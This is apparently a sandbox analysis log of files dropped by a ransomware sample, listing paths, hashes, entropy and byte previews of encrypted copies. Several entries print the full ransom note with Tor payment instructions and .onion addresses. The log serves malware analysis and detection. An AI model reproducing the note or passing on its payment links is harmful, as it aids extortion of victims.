                                                                                                                                                      Preview: 6b...YL....uE..u..e.LA...p...q............r....U."...=p.1........%.E...-.B8.8......2....EZg.Z..."o..=.U...b.g~..R....a.P.V.q.|.{....e.IP..W......(i0....&....As...gDOP.^....*S.j.wvREuQ.L.x7..[x\.O.4)i.o........|PkB....k....L..tL.&XM2..O,.O ~W.[...,....,......a.t..*..}._.7l...........K........|..`...B~./.baY....~&.......1`.C.0...#..R.i..H..B....>U......R...R.3...1o7G....2.y..o..;...T.r..q.....o.......](>.s.....7..p...d..":\..$..&..K....k.D....l].....{+... L9....w.3z./.p<5O@.\'... ..L.]..:......4....*..}...P'+%?=..2|.....Da.2..Kr.=.!..........M.\z.%=~........W.."-....b...v.Y.....[.I.%......@6.....S%.t....@k.Ak. ..q/..4?-$.@I..Mfk.-......[#".D.......&.q)b......[".d........,*..>Y...T..i.A..`K..>.k...7..qV......'.8.........i......c..[...[..........%.E.:..rg..>.._.3u...x.k.{...F..lg.....k...C.... 5..).'.....]....k.61.}...J.S9!Z.>..w....L... ....X...+'.PT.5$.g.......~"G.q.....'.c...j...z.....5.Y....|...R.F>|.[3ZP).C...p..KkY..|q.t..A...~
                                                                                                                                                      C:\Users\Public\Desktop\Google Chrome.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3056
                                                                                                                                                      Entropy (8bit):7.477882945080524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:bfSxz8a43XLaPJlX96AX0FXvwg2JDxhZR1qXyNRp/dJzCwgck38/Jb:L8RQL2Lyfp6bjJzTEKJb
                                                                                                                                                      MD5:CA3A93B2E6E5CA930A86FE2CCA5DD983
                                                                                                                                                      SHA1:A6776FEBB63C37945F7A217E6D343A4DAC094F0E
                                                                                                                                                      SHA-256:90FB72CF107B91C913DBFAD085782D7F7C302B9BCA14FFB6890B03CA51B80DF8
                                                                                                                                                      SHA-512:E2B5AF34D158ADAEB57624BA90D878B994C29CD4B3C6D89D5BA2154F3726AF12FD774707601D3A2F63CFAD7598D4B06EFC8BF7F564A07BBA64C79BBBDCD710A8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 6b...YL....uE..u..e.LA...p...q............r....U."...=p.1........%.E...-.B8.8......2....EZg.Z..."o..=.U...b.g~..R....a.P.V.q.|.{....e.IP..W......(i0....&....As...gDOP.^....*S.j.wvREuQ.L.x7..[x\.O.4)i.o........|PkB....k....L..tL.&XM2..O,.O ~W.[...,....,......a.t..*..}._.7l...........K........|..`...B~./.baY....~&.......1`.C.0...#..R.i..H..B....>U......R...R.3...1o7G....2.y..o..;...T.r..q.....o.......](>.s.....7..p...d..":\..$..&..K....k.D....l].....{+... L9....w.3z./.p<5O@.\'... ..L.]..:......4....*..}...P'+%?=..2|.....Da.2..Kr.=.!..........M.\z.%=~........W.."-....b...v.Y.....[.I.%......@6.....S%.t....@k.Ak. ..q/..4?-$.@I..Mfk.-......[#".D.......&.q)b......[".d........,*..>Y...T..i.A..`K..>.k...7..qV......'.8.........i......c..[...[..........%.E.:..rg..>.._.3u...x.k.{...F..lg.....k...C.... 5..).'.....]....k.61.}...J.S9!Z.>..w....L... ....X...+'.PT.5$.g.......~"G.q.....'.c...j...z.....5.Y....|...R.F>|.[3ZP).C...p..KkY..|q.t..A...~
                                                                                                                                                      C:\Users\Public\Desktop\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.616176582302796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:htd7bspOef8MBvCjaytW3zK8sevWAVgKTaCB7RZ0cHYIgtyUzfx5:hn7sjf8LaytCzCwgck38i
                                                                                                                                                      MD5:844572E8A8BCDA41BA912B766F2424BC
                                                                                                                                                      SHA1:1D1FB92CC77CFD12086520BD21DBD92BC7981DDA
                                                                                                                                                      SHA-256:0B758662EFA998D0C375FA632D9F54A874B7A08A28629078676794870F22BF08
                                                                                                                                                      SHA-512:DC6A10131DE240AC7C7120F1FF160ED1C621F79E8F38EEA6F52CC6E7E79822D1931744F97E72B08007C0928A9FEFBBF33BEDB3BA76FD7E8B269D014F2D6AF14A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...$......1..0..>.tO)D.ce.....{.*.....s............^.;\...fvdavm..x...`.s.I......5.SB..-Br......A.z....4.....|u.T.... .1....7f..e.@.D..C.l.......,_..D=..j.a}..W..]CwI$.>.....k.Oa...3bd..|..........'.H.-..s=.].U....b.T...G.h.X..Y4Do..5.F{.....5.Z..yr..n.x......A. ....f...W.%x...!..O.[+3.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Desktop\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.616176582302796
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:htd7bspOef8MBvCjaytW3zK8sevWAVgKTaCB7RZ0cHYIgtyUzfx5:hn7sjf8LaytCzCwgck38i
                                                                                                                                                      MD5:844572E8A8BCDA41BA912B766F2424BC
                                                                                                                                                      SHA1:1D1FB92CC77CFD12086520BD21DBD92BC7981DDA
                                                                                                                                                      SHA-256:0B758662EFA998D0C375FA632D9F54A874B7A08A28629078676794870F22BF08
                                                                                                                                                      SHA-512:DC6A10131DE240AC7C7120F1FF160ED1C621F79E8F38EEA6F52CC6E7E79822D1931744F97E72B08007C0928A9FEFBBF33BEDB3BA76FD7E8B269D014F2D6AF14A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...$......1..0..>.tO)D.ce.....{.*.....s............^.;\...fvdavm..x...`.s.I......5.SB..-Br......A.z....4.....|u.T.... .1....7f..e.@.D..C.l.......,_..D=..j.a}..W..]CwI$.>.....k.Oa...3bd..|..........'.H.-..s=.].U....b.T...G.h.X..Y4Do..5.F{.....5.Z..yr..n.x......A. ....f...W.%x...!..O.[+3.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Desktop\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Documents\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.974643258985677
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:wxCaRBXY7cXKAFzK8sevWAVgKTaCB7RZ0cHYIgtyUz3rj:WfXMUzCwgck38K3
                                                                                                                                                      MD5:917A3A42DAF748AB030828E1E7237A41
                                                                                                                                                      SHA1:C1A09F4D7DE04B487BC136A1B082F64C9907FD52
                                                                                                                                                      SHA-256:7C5EB520361AEBE25EF7CBF987520E0863D32A727743803C31EC52EE4FBFBFFA
                                                                                                                                                      SHA-512:78A811607C45CD8366E8DB07F47A31444C8C7A1890A959B48360AA33EFD3A222ADB69BE0D83A5819376A20B0B9778A2CC08F6396CCF9C267CDE3A26EF14A8C85
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....L>.u..w......*,......j+.....;.x.^.o|..7...Q...[7..S.Y.0.Rr....:-!..".....\.G...;siQ.[.../..E...8,.o[.G.v.K.Unu._..,...$..:...h..A..U........rtx;.......,x.vZ.........q... ..j.q..a...ktjh`2.7h=.....Y.C.../...,<.T..37...]h....Na....{.....}...w.s.......y...R.%I.....f..|:}...:.A...R..R..N->!.K.T.........:...d..AM..=.003..Q. ..R.....^P..)...a..e...mkSm.~..u...5R!...."=j=.rQ.F....Q...*..ZD.;]...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\Public\Documents\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.974643258985677
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:wxCaRBXY7cXKAFzK8sevWAVgKTaCB7RZ0cHYIgtyUz3rj:WfXMUzCwgck38K3
                                                                                                                                                      MD5:917A3A42DAF748AB030828E1E7237A41
                                                                                                                                                      SHA1:C1A09F4D7DE04B487BC136A1B082F64C9907FD52
                                                                                                                                                      SHA-256:7C5EB520361AEBE25EF7CBF987520E0863D32A727743803C31EC52EE4FBFBFFA
                                                                                                                                                      SHA-512:78A811607C45CD8366E8DB07F47A31444C8C7A1890A959B48360AA33EFD3A222ADB69BE0D83A5819376A20B0B9778A2CC08F6396CCF9C267CDE3A26EF14A8C85
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....L>.u..w......*,......j+.....;.x.^.o|..7...Q...[7..S.Y.0.Rr....:-!..".....\.G...;siQ.[.../..E...8,.o[.G.v.K.Unu._..,...$..:...h..A..U........rtx;.......,x.vZ.........q... ..j.q..a...ktjh`2.7h=.....Y.C.../...,<.T..37...]h....Na....{.....}...w.s.......y...R.%I.....f..|:}...:.A...R..R..N->!.K.T.........:...d..AM..=.003..Q. ..R.....^P..)...a..e...mkSm.~..u...5R!...."=j=.rQ.F....Q...*..ZD.;]...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\Public\Documents\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Downloads\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.612778827996026
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:O284bal4S7zK8sevWAVgKTaCB7RZ0cHYIgtyUzz:bba17zCwgck38u
                                                                                                                                                      MD5:6A8A6847A85ADB6DB3488375E989586F
                                                                                                                                                      SHA1:AB8711A44847F1B2E4B3E883C15959604441DCB0
                                                                                                                                                      SHA-256:B19E15617099142A7DEB41976617FEC1524EBBE2E5BF1BEE82374579334B2DD7
                                                                                                                                                      SHA-512:16642C526C0C7BA0461D2BCDE08F69B996536E024C9EF461C3C1A616BFE910C28181F86026AC30B0AFBB3376D13D03295BCC03B80C1311C2E2DEE4C10B31B7D3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .q..........2......!e.(...j...7&.S..g./4)*0k...Q3|...o...._.9...L.|2A... x..uu.S./Iq..L.....4.3..H..vfd4..4.qk..R....."c.*.v..Q.._1.5..|...J.@.5Q|.t..i)..Yc..Ts.zt)..9Y.T.e.......e.....`y.Z....^.%..*...yvo.....W.n._0.m.......cYS."..4Uvc.G..wI >..8z.h..]Z<?$.x&..M./.>..u......).....74.L~k'<j67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Downloads\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1120
                                                                                                                                                      Entropy (8bit):5.612778827996026
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:O284bal4S7zK8sevWAVgKTaCB7RZ0cHYIgtyUzz:bba17zCwgck38u
                                                                                                                                                      MD5:6A8A6847A85ADB6DB3488375E989586F
                                                                                                                                                      SHA1:AB8711A44847F1B2E4B3E883C15959604441DCB0
                                                                                                                                                      SHA-256:B19E15617099142A7DEB41976617FEC1524EBBE2E5BF1BEE82374579334B2DD7
                                                                                                                                                      SHA-512:16642C526C0C7BA0461D2BCDE08F69B996536E024C9EF461C3C1A616BFE910C28181F86026AC30B0AFBB3376D13D03295BCC03B80C1311C2E2DEE4C10B31B7D3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .q..........2......!e.(...j...7&.S..g./4)*0k...Q3|...o...._.9...L.|2A... x..uu.S./Iq..L.....4.3..H..vfd4..4.qk..R....."c.*.v..Q.._1.5..|...J.@.5Q|.t..i)..Yc..Ts.zt)..9Y.T.e.......e.....`y.Z....^.%..*...yvo.....W.n._0.m.......cYS."..4Uvc.G..wI >..8z.h..]Z<?$.x&..M./.>..u......).....74.L~k'<j67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E
                                                                                                                                                      C:\Users\Public\Downloads\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\Public\Libraries\RecordedTV.library-ms
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1952
                                                                                                                                                      Entropy (8bit):6.984838135049359
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Tm4rCT6b8n1XN8VAogC2Q4TEzCwgck38A9N:TweQyy84wzTEtH
                                                                                                                                                      MD5:4C308E008D4EA0A7A1B3F5916044F5A9
                                                                                                                                                      SHA1:4CADE739BFD5F3435056446E451E47B2423A98AD
                                                                                                                                                      SHA-256:0B4D1F6C0CF5C1802CDB18558E7100F4BC2B12655F02C62F6ACA6AE20497D361
                                                                                                                                                      SHA-512:E38057D67EEA04F4B3F86BF0C415FE36887A868B604C9C74B04E7F54AC6171A1F4C08D78D46880B6849B7D94830F1EDBDDC2976A8D566D937C2FCDA3ACC33774
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..G~h.......^iB....v...m...V...K:.\.....]S...yV........k.....+......MDS.u2.*......p......i....`..w..H9...~.b......H.1...A.{...D.Bt:....#@....`e./..K...zf..Q....|4|.K..._.Y.Y..O...0..%..R.=[c....t....H..h.._..z.k.b..f.A..yP..aa.s4.(..o....E^..Y>(9..O.....*..V......T2.$...Q{.`.j...upgP\..[.=..........*ma.W......H...e.....k.g.S!.\...#..J.'.W|...1|......./E56..N.8...8..t.....0..{.Fh..sfM..fu...M.Q.....G...y.2b..."."...x$..+P.x/...........y&=...C3....!PW...@K.V.....,.0..K^.X.6....gqB.8@b..~W.....rK.y...b^..w.Rd.$o.........(..&..j.cu.rm>.Yl06F...~.>.G .........1..\!.L}..v...u..O4.<$q...G.....^.9M.a%U.5p..a.b.4.mA..w.[./"..5..l......>N...c.%...w..S.e..3|..c(.J......#I...!S.X.rHx..R.&U......y...;.|..6.-N..jF.....W..eE......O..%P..[V..W.l......zR...;.".G........-.8...SY.^.fH.[3......6c..+.q".!..g.w8n...[..x.fp.....]c...l..V&.7...6\>._.T,.1...1,-m..m...../...G..m1......y.....ht.OH."..]..&...*3.At.K.5z...E....Y..........9..97.....'...._..P..w.....|%.h.
                                                                                                                                                      C:\Users\Public\Libraries\RecordedTV.library-ms.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1952
                                                                                                                                                      Entropy (8bit):6.984838135049359
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Tm4rCT6b8n1XN8VAogC2Q4TEzCwgck38A9N:TweQyy84wzTEtH
                                                                                                                                                      MD5:4C308E008D4EA0A7A1B3F5916044F5A9
                                                                                                                                                      SHA1:4CADE739BFD5F3435056446E451E47B2423A98AD
                                                                                                                                                      SHA-256:0B4D1F6C0CF5C1802CDB18558E7100F4BC2B12655F02C62F6ACA6AE20497D361
                                                                                                                                                      SHA-512:E38057D67EEA04F4B3F86BF0C415FE36887A868B604C9C74B04E7F54AC6171A1F4C08D78D46880B6849B7D94830F1EDBDDC2976A8D566D937C2FCDA3ACC33774
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..G~h.......^iB....v...m...V...K:.\.....]S...yV........k.....+......MDS.u2.*......p......i....`..w..H9...~.b......H.1...A.{...D.Bt:....#@....`e./..K...zf..Q....|4|.K..._.Y.Y..O...0..%..R.=[c....t....H..h.._..z.k.b..f.A..yP..aa.s4.(..o....E^..Y>(9..O.....*..V......T2.$...Q{.`.j...upgP\..[.=..........*ma.W......H...e.....k.g.S!.\...#..J.'.W|...1|......./E56..N.8...8..t.....0..{.Fh..sfM..fu...M.Q.....G...y.2b..."."...x$..+P.x/...........y&=...C3....!PW...@K.V.....,.0..K^.X.6....gqB.8@b..~W.....rK.y...b^..w.Rd.$o.........(..&..j.cu.rm>.Yl06F...~.>.G .........1..\!.L}..v...u..O4.<$q...G.....^.9M.a%U.5p..a.b.4.mA..w.[./"..5..l......>N...c.%...w..S.e..3|..c(.J......#I...!S.X.rHx..R.&U......y...;.|..6.-N..jF.....W..eE......O..%P..[V..W.l......zR...;.".G........-.8...SY.^.fH.[3......6c..+.q".!..g.w8n...[..x.fp.....]c...l..V&.7...6\>._.T,.1...1,-m..m...../...G..m1......y.....ht.OH."..]..&...*3.At.K.5z...E....Y..........9..97.....'...._..P..w.....|%.h.
                                                                                                                                                      C:\Users\Public\Libraries\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
